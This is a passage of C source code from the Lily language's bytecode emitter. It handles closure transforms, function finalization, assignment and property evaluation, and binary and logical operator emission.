/* All of the o_except cases of a single try block are linked together. The last one has a jump position of 0 to mean that it's at the end. Make sure that is preserved. */ if (op != o_except && emit->code[pos + i + j] != 0) { jump_pos = i + j; jump_end = jump_pos + 1; } } else if (c == C_COUNT_JUMPS) { jump_pos = i + j; jump_end = jump_pos + count; j += count - 1; } else if (c == C_COUNT_LIST) { for (j = 0;j < count;j++) { int spot = emit->code[pos + i + j]; if (transform_table[spot] != (uint16_t)-1) { write_4(emit, o_get_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } j--; } else if (c == C_COUNT_OUTPUTS) { output_pos = i + j; output_end = output_pos + count; j += count - 1; } else if (c == C_COUNT_OPTARGS) { count = emit->code[pos + i + j]; /* Optargs is unique in that it contains two kinds of things. The first half are literals, and the second half are register outputs. */ output_pos = i + j + 1 + (count / 2); output_end = i + j + 1 + count; /* Do not do count - 1 because this one includes the size with it since there's no standalone non-counted optargs. */ j += count; } } int move = i + j; write_prep(emit, move); memcpy(emit->code + emit->code_pos, emit->code + pos, move * sizeof(uint16_t)); if (jump_pos != -1) { for (;jump_pos < jump_end;jump_pos++) emit->code[emit->code_pos + jump_pos] += jump_adjust; jump_pos = -1; } emit->code_pos += move; if (output_pos != -1) { for (;output_pos < output_end;output_pos++) { int spot = emit->code[pos + output_pos]; if (spot != (uint16_t)-1 && transform_table[spot] != (uint16_t)-1) { write_4(emit, o_set_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } output_pos = -1; } pos += move; } } /* Consider this: define f(a: integer => function( => integer)) { return {|| a} } The parameter 'a' is used as an upvalue, is never used within the function it is declared in. As a result, there are no writes to transform as a means of putting 'a' into the closure. This solves that by writing an explicit o_set_upvalue where it is needed, before the transform. However, if o_setup_optargs is present, then nothing is written for the parameter (o_setup_optargs will come later, and it will not have a value). */ static void ensure_params_in_closure(lily_emit_state *emit) { lily_var *function_var = emit->block->function_var; int local_count = function_var->type->subtype_count - 1; if (local_count == 0) return; lily_class *optarg_class = emit->symtab->optarg_class; /* The vars themselves aren't marked optargs, because that would be silly. To know if something has optargs, prod the function's types. */ lily_type **real_param_types = function_var->type->subtypes; lily_var *var_iter = emit->symtab->active_import->var_chain; while (var_iter != function_var) { if (var_iter->flags & SYM_CLOSED_OVER && var_iter->reg_spot < local_count) { lily_type *real_type = real_param_types[var_iter->reg_spot + 1]; if (real_type->cls != optarg_class) write_4(emit, o_set_upvalue, function_var->line_num, find_closed_sym_spot(emit, (lily_sym *)var_iter), var_iter->reg_spot); } var_iter = var_iter->next; } } static void setup_transform_table(lily_emit_state *emit) { if (emit->transform_size < emit->function_block->next_reg_spot) { emit->transform_table = lily_realloc(emit->transform_table, emit->function_block->next_reg_spot * sizeof(uint16_t)); emit->transform_size = emit->function_block->next_reg_spot; } memset(emit->transform_table, (uint16_t)-1, sizeof(uint16_t) * emit->function_block->next_reg_spot); int i; for (i = 0;i < emit->closed_pos;i++) { lily_sym *s = (lily_sym *)emit->closed_syms[i]; if (s && s->flags & ITEM_TYPE_VAR) { lily_var *v = (lily_var *)s; if (v->function_depth == emit->function_depth) { emit->transform_table[v->reg_spot] = i; /* Each var can only be transformed once, and within the scope it was declared. This prevents two nested functions from trying to transform the same (now-dead) vars. */ emit->closed_syms[i] = NULL; } } } } /* This function is called to transform the currently available segment of code (emit->block->code_start up to emit->code_pos) into code that will work for closures. there are a couple things to do before the transform: * The first part is to setup the emitter's "transform table". This table will map from a var's position in the current function's locals to the position it has in the current closure. This will be used by transform_code. * Depending on where this function is (is it a class method, a nested function, or the top-most function), a different opcode will get written that will become the top of the transformed code. */ static void closure_code_transform(lily_emit_state *emit, lily_function_val *f, int *new_start, int *new_size) { int transform_start = emit->block->code_start; int start = transform_start; int end = emit->code_pos; *new_start = emit->code_pos; int save_code_pos = emit->code_pos; /* To make sure that the closure information is not unexpectedly destroyed, it is stored into a register. get_unique_storage is custom made for this, and will grab a storage that nothing else is using. */ lily_storage *s = get_unique_storage(emit, emit->block->function_var->type); int closed_self_spot = find_closed_self_spot(emit); /* Take note that the new code start will be the current code end + 1. Anything written from here until the code transform will appear at the top of the transformed code. */ if (emit->function_depth == 2) { /* A depth of 2 means that this is the very top function. It will need to create the closure that gets passed down. This is really easy. */ write_4(emit, o_create_closure, f->line_num, emit->closed_pos, s->reg_spot); if (emit->block->block_type & BLOCK_CLASS) { /* Classes are slightly tricky. There are (up to) three different things that really want to be at the top of the code: o_new_instance, o_setup_optargs, and o_function_call (in the event that there is an inherited new). Inject o_new_instance, then patch that out of the header so that transform doesn't write it in again. */ uint16_t linenum = emit->code[start + 1]; uint16_t self_reg_spot = emit->code[start + 2]; write_3(emit, o_new_instance, linenum, self_reg_spot); transform_start += 3; /* The closure only needs to hold self if there was a lambda that used self (because the lambda doesn't automatically get self). */ if (closed_self_spot != -1) { write_4(emit, o_set_upvalue, linenum, closed_self_spot, self_reg_spot); /* This class is going out of scope, so the 'self' it contians is going away as well. */ emit->closed_syms[closed_self_spot] = NULL; } lily_class *cls = emit->block->class_entry; /* This is only set if a class method needed to access some part of the closure through the class. This is likely to be the case, but may not always be (ex: the class only contains lambdas). */ lily_prop_entry *closure_prop; closure_prop = lily_find_property(emit->symtab, cls, "*closure"); if (closure_prop) { write_5(emit, o_set_property, linenum, self_reg_spot, closure_prop->id, s->reg_spot); } } } else if (emit->block->prev && emit->block->prev->block_type & BLOCK_CLASS) { if ((emit->block->block_type & BLOCK_LAMBDA) == 0) { lily_class *cls = emit->block->prev->class_entry; lily_prop_entry *closure_prop = lily_find_property(emit->symtab, cls, "*closure"); lily_class *parent = cls->parent; if (closure_prop == NULL || /* This should yield a closure stored in THIS class, not one that may be in a parent class. */ (parent && closure_prop->id <= parent->prop_count)) closure_prop = lily_add_class_property(emit->symtab, cls, s->type, "*closure", 0); write_5(emit, o_load_class_closure, f->line_num, emit->block->self->reg_spot, closure_prop->id, s->reg_spot); } else { /* Lambdas inside of a class are weird because they don't necessarily have self as their first argument. They will, however, have a closure to draw from. */ write_3(emit, o_load_closure, f->line_num, s->reg_spot); lily_storage *lambda_self = emit->block->self; if (lambda_self) { write_4(emit, o_get_upvalue, *emit->lex_linenum, closed_self_spot, lambda_self->reg_spot); } } } else write_3(emit, o_load_closure, (uint16_t)f->line_num, s->reg_spot); ensure_params_in_closure(emit); setup_transform_table(emit); if (emit->function_depth == 2) emit->closed_pos = 0; /* Closures create patches when they write o_create_function. Fix those patches with the spot of the closure (since they need to draw closure info but won't have it just yet). */ if (emit->block->patch_start != emit->patch_pos) write_block_patches(emit, s->reg_spot); /* Since jumps reference absolute locations, they need to be adjusted for however much bytecode is written as a header. The transform - code_start is so that class closures are accounted for as well (since the o_new_instance is rewritten). */ int starting_adjust = (emit->code_pos - save_code_pos) + (transform_start - emit->block->code_start); transform_code(emit, f, transform_start, end, starting_adjust); *new_size = emit->code_pos - *new_start; } static void create_code_block_for(lily_emit_state *emit, lily_function_val *f) { int code_start, code_size; if (emit->closed_pos == 0) { code_start = emit->block->code_start; code_size = emit->code_pos - emit->block->code_start; } else closure_code_transform(emit, f, &code_start, &code_size); uint16_t *code = lily_malloc((code_size + 1) * sizeof(uint16_t)); memcpy(code, emit->code + code_start, sizeof(uint16_t) * code_size); f->code = code; f->len = code_size - 1; } /* finalize_function_val This is a helper called when a function block is being exited, OR __main__ needs to run. In both cases, the register info that the vm needs to init the registers for this function is created. For non-__main__ functions, inner functions are hidden in symtab's old_function_chain, and the vars go out of scope. */ static void finalize_function_val(lily_emit_state *emit, lily_block *function_block) { lily_function_val *f = emit->top_function; /* This must run before the rest, because if 'f' needs to be a closure, it will require a unique storage. */ create_code_block_for(emit, f); int register_count = emit->function_block->next_reg_spot; lily_storage *storage_iter = function_block->storage_start; lily_register_info *info = lily_malloc( register_count * sizeof(lily_register_info)); lily_var *var_stop = function_block->function_var; lily_type *function_type = var_stop->type; /* Don't include functions inside of themselves... */ if (emit->function_depth == 1) var_stop = var_stop->next; if (emit->function_depth != 1) add_var_chain_to_info(emit, info, emit->symtab->active_import->var_chain, var_stop); if (function_type->flags & TYPE_IS_UNRESOLVED) f->has_generics = 1; add_storage_chain_to_info(info, function_block->storage_start); if (emit->function_depth > 1) { /* todo: Reuse the var shells instead of destroying. Seems petty, but malloc isn't cheap if there are a lot of vars. */ lily_var *var_iter = emit->symtab->active_import->var_chain; lily_var *var_temp; while (var_iter != var_stop) { var_temp = var_iter->next; if ((var_iter->flags & VAR_IS_READONLY) == 0) lily_free(var_iter); else { /* This is a function declared within the current function. Hide it in symtab's old functions since it's going out of scope. */ var_iter->next = emit->symtab->old_function_chain; emit->symtab->old_function_chain = var_iter; } /* The function value now owns the var names, so don't free them. */ var_iter = var_temp; } } /* Blank the types of the storages that were used. This lets other functions know that the types are not in use. */ storage_iter = function_block->storage_start; while (storage_iter) { storage_iter->type = NULL; storage_iter = storage_iter->next; } /* Unused storages now begin where the function starting zapping them. */ emit->unused_storage_start = function_block->storage_start; f->reg_info = info; f->reg_count = register_count; } static void leave_function(lily_emit_state *emit, lily_block *block) { /* A lambda block never has to update the return type because the return is whatever the expression in the body returns. */ if (block->block_type & BLOCK_LAMBDA) emit->top_function_ret = emit->top_var->type->subtypes[0]; if (emit->block->class_entry == NULL) { if (emit->top_function_ret == NULL) /* Write an implicit 'return' at the end of a function claiming to not return a value. This saves the user from having to write an explicit 'return'. */ write_2(emit, o_return_noval, *emit->lex_linenum); else if (block->block_type == BLOCK_FUNCTION && block->last_return != emit->code_pos) { /* If this is a function created with 'define', then determine if the last return was the last instruction written. This is the simple way of ensuring that a function always returns a value that stops potential issues at emit-time. */ lily_raise(emit->raiser, lily_SyntaxError, "Missing return statement at end of function.\n"); } } else { /* Constructors always return self. */ write_3(emit, o_return_val, *emit->lex_linenum, emit->block->self->reg_spot); } finalize_function_val(emit, block); /* Information must be pulled from and saved to the last function-like block. This loop is because of lambdas. */ lily_block *last_func_block = block->prev; while ((last_func_block->block_type & BLOCK_FUNCTION) == 0) last_func_block = last_func_block->prev; lily_var *v = last_func_block->function_var; emit->current_class = block->prev->class_entry; /* If this function was the ::new for a class, move it over into that class since the class is about to close. */ if (emit->block->class_entry) { lily_class *cls = emit->block->class_entry; emit->symtab->active_import->var_chain = block->function_var; lily_add_class_method(emit->symtab, cls, block->function_var); } else if (emit->block->block_type != BLOCK_FILE) emit->symtab->active_import->var_chain = block->function_var; /* For file 'blocks', don't fix the var_chain or all of the toplevel functions in that block will vanish! */ if (block->prev->generic_count != block->generic_count && (block->block_type & BLOCK_LAMBDA) == 0) { lily_update_symtab_generics(emit->symtab, NULL, last_func_block->generic_count); } emit->top_function = last_func_block->function_value; emit->top_var = v; emit->top_function_ret = v->type->subtypes[0]; emit->code_pos = block->code_start; emit->function_block = last_func_block; /* File 'blocks' do not bump up the depth because that's used to determine if something is a global or not. */ if (block->block_type != BLOCK_FILE) { if (block->block_type & BLOCK_LAMBDA) emit->lambda_depth--; emit->function_depth--; } } /* eval_enforce_value Evaluate a given ast and make sure it returns a value. */ static void eval_enforce_value(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, char *message) { eval_tree(emit, ast, expect_type, 1); emit->expr_num++; if (ast->result == NULL) lily_raise(emit->raiser, lily_SyntaxError, message); } /* ensure_proper_match_block This function checks if the current block (verified to be a match block by the caller) has all cases satisfied. Raise SyntaxError if there are missing cases. */ static void ensure_proper_match_block(lily_emit_state *emit) { lily_block *block = emit->block; int error = 0; lily_msgbuf *msgbuf = emit->raiser->msgbuf; int i; lily_class *match_class = block->match_sym->type->cls; for (i = block->match_case_start;i < emit->match_case_pos;i++) { if (emit->match_cases[i] == 0) { if (error == 0) { lily_msgbuf_add(msgbuf, "Match pattern not exhaustive. The following case(s) are missing:\n"); error = 1; } lily_msgbuf_add_fmt(msgbuf, "* %s\n", match_class->variant_members[i]->name); } } if (error) lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } static void push_info_to_error(lily_emit_state *emit, lily_emit_call_state *cs) { char *class_name = "", *separator = "", *kind = "Function"; char *call_name; lily_msgbuf *msgbuf = emit->raiser->msgbuf; int item_flags = cs->error_item->flags; if (item_flags & ITEM_TYPE_VAR) { lily_var *var = (lily_var *)cs->error_item; if (var->parent) { class_name = var->parent->name; separator = "::"; } call_name = var->name; } else if (item_flags & ITEM_TYPE_VARIANT_CLASS) { lily_class *variant_cls = (lily_class *)cs->error_item; call_name = variant_cls->name; if (variant_cls->parent->flags & CLS_ENUM_IS_SCOPED) { class_name = variant_cls->parent->name; separator = "::"; } kind = "Variant"; } else if (item_flags & ITEM_TYPE_PROPERTY) { lily_prop_entry *prop = (lily_prop_entry *)cs->error_item; class_name = prop->cls->name; call_name = prop->name; separator = "."; kind = "Property"; } else { /* This occurs when there's a call of a call, a call of a subscript result, or something else weird. */ call_name = "(anonymous)"; } lily_msgbuf_add_fmt(msgbuf, "%s %s%s%s", kind, class_name, separator, call_name); } /* assign_post_check This function is called after any assignment is evaluated. This allows assignment chains (because those are nice), but disables assignments from being nested within other expressions. Without this function, things like 'integer a = (b = 10)' are possible. The tree passed is the assignment tree itself. */ static void assign_post_check(lily_emit_state *emit, lily_ast *ast) { if (ast->parent && (ast->parent->tree_type != tree_binary || ast->parent->op < expr_assign)) { lily_raise(emit->raiser, lily_SyntaxError, "Cannot nest an assignment within an expression.\n"); } else if (ast->parent == NULL) /* This prevents conditions from using the result of an assignment. */ ast->result = NULL; } /*****************************************************************************/ /* Error raising functions */ /*****************************************************************************/ static void bad_assign_error(lily_emit_state *emit, int line_num, lily_type *left_type, lily_type *right_type) { /* Remember that right is being assigned to left, so right should get printed first. */ lily_raise_adjusted(emit->raiser, line_num, lily_SyntaxError, "Cannot assign type '^T' to type '^T'.\n", right_type, left_type); } static void bad_arg_error(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *got, lily_type *expected) { push_info_to_error(emit, cs); lily_msgbuf *msgbuf = emit->raiser->msgbuf; emit->raiser->line_adjust = cs->ast->line_num; /* If this call has unresolved generics, resolve those generics as themselves so the error message prints out correctly. */ lily_ts_resolve_as_self(emit->ts); /* These names are intentionally the same length and on separate lines so that slight naming issues become more apparent. */ lily_msgbuf_add_fmt(msgbuf, ", argument #%d is invalid:\n" "Expected Type: ^T\n" "Received Type: ^T\n", cs->arg_count + 1, lily_ts_resolve(emit->ts, expected), got); lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } /* determine_left_type This function is called on the left side of an assignment to determine what the result of that assignment will be. However, this function does NOT do any evaluation. This function exists because assignments run from right to left, but at the same time the right side should infer the resulting type based off of the left side. */ static lily_type *determine_left_type(lily_emit_state *emit, lily_ast *ast) { lily_type *result_type = NULL; if (ast->tree_type == tree_global_var || ast->tree_type == tree_local_var) result_type = ast->sym->type; else if (ast->tree_type == tree_subscript) { lily_ast *var_tree = ast->arg_start; lily_ast *index_tree = var_tree->next_arg; result_type = determine_left_type(emit, var_tree); if (result_type != NULL) { if (result_type->cls->id == SYM_CLASS_HASH) result_type = result_type->subtypes[1]; else if (result_type->cls->id == SYM_CLASS_TUPLE) { if (index_tree->tree_type != tree_literal || index_tree->sym->type->cls->id != SYM_CLASS_INTEGER) result_type = NULL; else { int literal_index = index_tree->literal->value.integer; if (literal_index < 0 || literal_index > result_type->subtype_count) result_type = NULL; else result_type = result_type->subtypes[literal_index]; } } else if (result_type->cls->id == SYM_CLASS_LIST) result_type = result_type->subtypes[0]; } } else if (ast->tree_type == tree_oo_access) { result_type = determine_left_type(emit, ast->arg_start); if (result_type != NULL) { char *oo_name = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); lily_class *lookup_class = result_type->cls; lily_type *lookup_type = result_type; lily_prop_entry *prop = lily_find_property(emit->symtab, lookup_class, oo_name); if (prop) { result_type = prop->type; if (result_type->flags & TYPE_IS_UNRESOLVED) { result_type = lily_ts_resolve_by_second(emit->ts, lookup_type, result_type); } } else result_type = NULL; } } /* All other are either invalid for the left side of an assignment. */ else result_type = NULL; return result_type; } /*****************************************************************************/ /* Tree evaluation functions (and tree-related helpers). */ /*****************************************************************************/ /* emit_binary_op This is called to handle simple binary ops (except for assign). Compound ops will route through here via emit_op_for_compound, and depend on this function NOT doing any evaluation. */ static void emit_binary_op(lily_emit_state *emit, lily_ast *ast) { int opcode; lily_class *lhs_class, *rhs_class, *storage_class; lily_storage *s; lhs_class = ast->left->result->type->cls; rhs_class = ast->right->result->type->cls; if (lhs_class->id <= SYM_CLASS_STRING && rhs_class->id <= SYM_CLASS_STRING) opcode = generic_binop_table[ast->op][lhs_class->id][rhs_class->id]; else { /* Calling type_matchup here to do the test allows 'any' to compare to base values, as well as enum classes to compare to instances of their inner subtypes. Call it twice for each side so that this works: any a = 10 a == 10 10 == a */ if (ast->left->result->type == ast->right->result->type || type_matchup(emit, ast->left->result->type, ast->right) || type_matchup(emit, ast->right->result->type, ast->left)) { if (ast->op == expr_eq_eq) opcode = o_is_equal; else if (ast->op == expr_not_eq) opcode = o_not_eq; else opcode = -1; } else opcode = -1; } if (opcode == -1) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid operation: ^T %s ^T.\n", ast->left->result->type, opname(ast->op), ast->right->result->type); if (ast->op == expr_plus || ast->op == expr_minus || ast->op == expr_multiply || ast->op == expr_divide) if (lhs_class->id >= rhs_class->id) storage_class = lhs_class; else storage_class = rhs_class; else /* assign is handled elsewhere, so these are just comparison ops. These always return 0 or 1, regardless of the classes put in. There's no bool class (yet), so an integer class is used instead. */ storage_class = emit->symtab->integer_class; s = get_storage(emit, storage_class->type); s->flags |= SYM_NOT_ASSIGNABLE; write_5(emit, opcode, ast->line_num, ast->left->result->reg_spot, ast->right->result->reg_spot, s->reg_spot); ast->result = (lily_sym *)s; } /* emit_op_for_compound Examples: +=, -=, *=, /=, etc. X Y= Z can be folded into X = X Y Z This allows the vm to not have compound expression opcodes. This assumes that the left and the right have already been walked. */ static void emit_op_for_compound(lily_emit_state *emit, lily_ast *ast) { int save_op = ast->op; int spoof_op; if (ast->op == expr_div_assign) spoof_op = expr_divide; else if (ast->op == expr_mul_assign) spoof_op = expr_multiply; else if (ast->op == expr_modulo_assign) spoof_op = expr_modulo; else if (ast->op == expr_plus_assign) spoof_op = expr_plus; else if (ast->op == expr_minus_assign) spoof_op = expr_minus; else if (ast->op == expr_left_shift_assign) spoof_op = expr_left_shift; else if (ast->op == expr_right_shift_assign) spoof_op = expr_right_shift; else { lily_raise(emit->raiser, lily_SyntaxError, "Invalid compound op: %s.\n", opname(ast->op)); spoof_op = -1; } ast->op = spoof_op; emit_binary_op(emit, ast); ast->op = save_op; } /* assign_optimize_check ALL opcodes that return a result always have the result as the last value written. This is no accident: There are many cases where the emitter makes a storage that isn't needed. This function determines if an assignment can be optimized out by rewriting the last emitted opcode to return to what would have been assigned to. */ static int assign_optimize_check(lily_ast *ast) { int can_optimize = 1; do { /* assigning to a global is done differently than with a local, so it can't be optimized. */ if (ast->left->tree_type == tree_global_var) { can_optimize = 0; break; } lily_ast *right_tree = ast->right; /* Parenths don't write anything, so dive to the bottom of them. */ while (right_tree->tree_type == tree_parenth) right_tree = right_tree->arg_start; /* Gotta do basic assignments. */ if (right_tree->tree_type == tree_local_var) { can_optimize = 0; break; } /* If the parent is binary, then it is an assignment or compound op. Those eval from right-to-left, so leave them alone. */ if (ast->parent != NULL && ast->parent->tree_type == tree_binary) { can_optimize = 0; break; } /* Also check if the right side is an assignment or compound op. */ if (right_tree->tree_type == tree_binary && right_tree->op >= expr_assign) { can_optimize = 0; break; } /* If the left is an any and the right is not, then don't reduce. Any assignment is written so that it puts the right side into a container. */ if (ast->left->result->type->cls->id == SYM_CLASS_ANY && right_tree->result->type->cls->id != SYM_CLASS_ANY) { can_optimize = 0; break; } } while (0); return can_optimize; } /* calculate_var_type This is called when the left side of an assignment doesn't have a type because it was declared using 'var ...'. This will return the proper type for the left side of the expression. */ static lily_type *calculate_var_type(lily_emit_state *emit, lily_type *input_type) { lily_type *result; if (input_type->cls->flags & CLS_VARIANT_CLASS) result = lily_ts_build_enum_by_variant(emit->ts, input_type); else result = input_type; return result; } /* eval_assign This handles assignments where the left is not a subscript or dot access. */ static void eval_assign(lily_emit_state *emit, lily_ast *ast) { int left_cls_id, opcode; lily_sym *left_sym, *right_sym; opcode = -1; if (ast->left->tree_type != tree_global_var && ast->left->tree_type != tree_local_var) { /* If the left is complex and valid, it would have been sent off to a different assign. Ergo, it must be invalid. */ lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); } if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, ast->left->result->type, 1); /* For 'var <name> = ...', fix the type. */ if (ast->left->result->type == NULL) ast->left->result->type = calculate_var_type(emit, ast->right->result->type); ast->left->result->flags &= ~SYM_NOT_INITIALIZED; left_sym = ast->left->result; right_sym = ast->right->result; left_cls_id = left_sym->type->cls->id; if (left_sym->type != right_sym->type) { if (left_sym->type->cls->id == SYM_CLASS_ANY) { /* Bare variants are not allowed, and type_matchup is a bad idea here. Rebox the variant into an enum, then let assign do the rest of the magic. The reason that type_matchup is a bad idea is that it will box the variant into an enum, then an any, which will be the target of the assign. This results in a junk storage. */ if (right_sym->type->cls->flags & CLS_VARIANT_CLASS) { rebox_variant_to_enum(emit, ast->right); right_sym = ast->right->result; } opcode = o_assign; } else if (type_matchup(emit, ast->left->result->type, ast->right)) { /* type_matchup may update the result, so update the cache. */ right_sym = ast->right->result; } else bad_assign_error(emit, ast->line_num, left_sym->type, right_sym->type); } if (opcode == -1) { if (left_cls_id == SYM_CLASS_INTEGER || left_cls_id == SYM_CLASS_DOUBLE) opcode = o_fast_assign; else opcode = o_assign; } if (ast->op > expr_assign) { if (ast->left->tree_type == tree_global_var) eval_tree(emit, ast->left, NULL, 1); emit_op_for_compound(emit, ast); right_sym = ast->result; } if (ast->left->tree_type == tree_global_var) opcode = o_set_global; /* If assign can be optimized out, then rewrite the last result to point to the left side. */ if (assign_optimize_check(ast)) emit->code[emit->code_pos-1] = left_sym->reg_spot; else { write_4(emit, opcode, ast->line_num, right_sym->reg_spot, left_sym->reg_spot); } ast->result = right_sym; } /* This is an access like 'abc.xyz'. There are two fairly different cases for this: 1: The given class has a method named xyz. This is checked first. Examples: 'string.concat' and 'integer.to_string'. 2: The given class has a property named xyz. In this case, the value is a class which is subscripted for the right property. This stores either the method var or the property within the ast's item. */ static void eval_oo_access_for_item(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth && ast->arg_start->tree_type == tree_self) maybe_close_over_class_self(emit); if (ast->arg_start->tree_type != tree_local_var) eval_tree(emit, ast->arg_start, NULL, 1); lily_class *lookup_class = ast->arg_start->result->type->cls; char *oo_name = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); lily_var *var = lily_find_class_callable(emit->symtab, lookup_class, oo_name); /* Is this an attempt to access a method that hasn't been loaded yet? */ if (var == NULL) var = lily_parser_dynamic_load(emit->parser, lookup_class, oo_name); if (var == NULL) { lily_prop_entry *prop = lily_find_property(emit->symtab, lookup_class, oo_name); if (prop == NULL) { lily_raise(emit->raiser, lily_SyntaxError, "Class %s has no method or property named %s.\n", lookup_class->name, oo_name); } if (ast->arg_start->tree_type == tree_self) lily_raise(emit->raiser, lily_SyntaxError, "Use @<name> to get/set properties, not self.<name>.\n"); ast->item = (lily_item *)prop; } else ast->item = (lily_item *)var; } /* This is called on trees of type tree_oo_access which have their ast->item as a property. This will solve the property with the type that lead up to it. class example[A](value: A) { var contents = value } var v = example::new(10).contents 'contents' has type 'A' relative to whatever type that 'example' contains. Since example has type 'integer', then 'v' is solved to be of type integer. This is a convenience function to avoid creating a storage for the property when that may not be wanted. */ static lily_type *get_solved_property_type(lily_emit_state *emit, lily_ast *ast) { lily_type *property_type = ast->property->type; if (property_type->flags & TYPE_IS_UNRESOLVED) { property_type = lily_ts_resolve_by_second(emit->ts, ast->arg_start->result->type, property_type); } return property_type; } /* This is called after the caller has run eval_oo_access_for_item and has determined that they want the property in a storage. This does that. */ static void oo_property_read(lily_emit_state *emit, lily_ast *ast) { lily_prop_entry *prop = ast->property; lily_type *type = get_solved_property_type(emit, ast); lily_storage *result = get_storage(emit, type); /* This function is only called on trees of type tree_oo_access which have a property into the ast's item. */ write_5(emit, o_get_property, ast->line_num, ast->arg_start->result->reg_spot, prop->id, result->reg_spot); ast->result = (lily_sym *)result; } /* This handles tree_oo_access for eval_tree. The contents are always dumped into a storage, unlike with some users of tree_oo_access. */ static void eval_oo_access(lily_emit_state *emit, lily_ast *ast) { eval_oo_access_for_item(emit, ast); /* An 'x.y' access will either yield a property or a class method. */ if (ast->item->flags & ITEM_TYPE_PROPERTY) oo_property_read(emit, ast); else { lily_storage *result = get_storage(emit, ast->sym->type); write_4(emit, o_get_readonly, ast->line_num, ast->sym->reg_spot, result->reg_spot); ast->result = (lily_sym *)result; } } /* eval_property This handles evaluating '@<x>' within a either a class constructor or a function/method defined within a class. */ static void eval_property(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth && ast->left->tree_type == tree_self); maybe_close_over_class_self(emit); if (ast->property->type == NULL) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid use of uninitialized property '@%s'.\n", ast->property->name); lily_storage *result = get_storage(emit, ast->property->type); write_5(emit, o_get_property, ast->line_num, emit->block->self->reg_spot, ast->property->id, result->reg_spot); ast->result = (lily_sym *)result; } /* This is called to handle assignments when the left side is of type tree_oo_access (ex: x[0].y = z, a.b.c = d). */ static void eval_oo_assign(lily_emit_state *emit, lily_ast *ast) { lily_type *left_type; eval_oo_access_for_item(emit, ast->left); left_type = ast->left->property->type; if ((ast->left->item->flags & ITEM_TYPE_PROPERTY) == 0) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, left_type, 1); left_type = get_solved_property_type(emit, ast->left); lily_sym *rhs = ast->right->result; lily_type *right_type = rhs->type; if (left_type != right_type && left_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, left_type, right_type); } if (ast->op > expr_assign) { oo_property_read(emit, ast->left); emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_property, ast->line_num, ast->left->arg_start->result->reg_spot, ast->left->property->id, rhs->reg_spot); ast->result = rhs; } /* This handles assignments like '@x = y'. These are always simple, because if it was something like '@x[y] = z', then subscript assign would get it. The left side is always just a property. */ static void eval_property_assign(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth) maybe_close_over_class_self(emit); lily_type *left_type = ast->left->property->type; lily_sym *rhs; if (ast->right->tree_type != tree_local_var) /* Important! Expecting the lhs will auto-fix the rhs if needed. */ eval_tree(emit, ast->right, left_type, 1); rhs = ast->right->result; lily_type *right_type = ast->right->result->type; /* For 'var @<name> = ...', fix the type of the property. */ if (left_type == NULL) { ast->left->property->type = right_type; ast->left->property->flags &= ~SYM_NOT_INITIALIZED; left_type = right_type; } if (left_type != right_type && left_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, left_type, right_type); } if (ast->op > expr_assign) { eval_tree(emit, ast->left, NULL, 1); emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_property, ast->line_num, emit->block->self->reg_spot, ast->left->property->id, rhs->reg_spot); ast->result = rhs; } static void eval_upvalue_assign(lily_emit_state *emit, lily_ast *ast) { eval_tree(emit, ast->right, NULL, 1); int spot; lily_sym *left_sym = ast->left->sym; if (ast->left->tree_type == tree_open_upvalue) { close_over_sym(emit, left_sym); spot = emit->closed_pos - 1; } else spot = find_closed_sym_spot(emit, ast->left->sym); lily_sym *rhs = ast->right->result; if (ast->op > expr_assign) { /* Don't call eval_tree again, because if the left is tree_open_upvalue, the left will be closed over again. That will result in the compound op using the wrong upvalue spot, which is bad. */ lily_storage *s = get_storage(emit, ast->left->sym->type); write_4(emit, o_get_upvalue, ast->line_num, spot, s->reg_spot); ast->left->result = (lily_sym *)s; emit_op_for_compound(emit, ast); rhs = ast->result; } write_4(emit, o_set_upvalue, ast->line_num, spot, rhs->reg_spot); ast->result = ast->right->result; } /* eval_logical_op This handles || (or) as well as && (and). */ static void eval_logical_op(lily_emit_state *emit, lily_ast *ast) { lily_storage *result; int is_top, jump_on; jump_on = (ast->op == expr_logical_or); /* The top-most and/or creates an ANDOR block so that all of the jumps that get written can be properly folded. */ if (ast->parent == NULL || (ast->parent->tree_type != tree_binary || ast->parent->op != ast->op)) { is_top = 1; lily_emit_enter_block(emit, BLOCK_ANDOR); } else is_top = 0; if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, NULL, 1); /* If the left is the same as this tree, then it's already checked itself and doesn't need a retest. However, and/or are opposites, so they have to check each other (so the op has to be exactly the same). */ if ((ast->left->tree_type == tree_binary && ast->left->op == ast->op) == 0) emit_jump_if(emit, ast->left, jump_on); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, NULL, 1); emit_jump_if(emit, ast->right, jump_on); if (is_top == 1) { int save_pos; lily_tie *success_lit, *failure_lit; lily_symtab *symtab = emit->symtab; result = get_storage(emit, symtab->integer_class->type); success_lit = lily_get_integer_literal(symtab, (ast->op == expr_logical_and)); failure_lit = lily_get_integer_literal(symtab, (ast->op == expr_logical_or)); write_4(emit, o_get_readonly, ast->line_num, success_lit->reg_spot, result->reg_spot); write_2(emit, o_jump, 0); save_pos = emit->code_pos - 1; lily_emit_leave_block(emit); write_4(emit, o_get_readonly, ast->line_num, failure_lit->reg_spot, result->reg_spot); 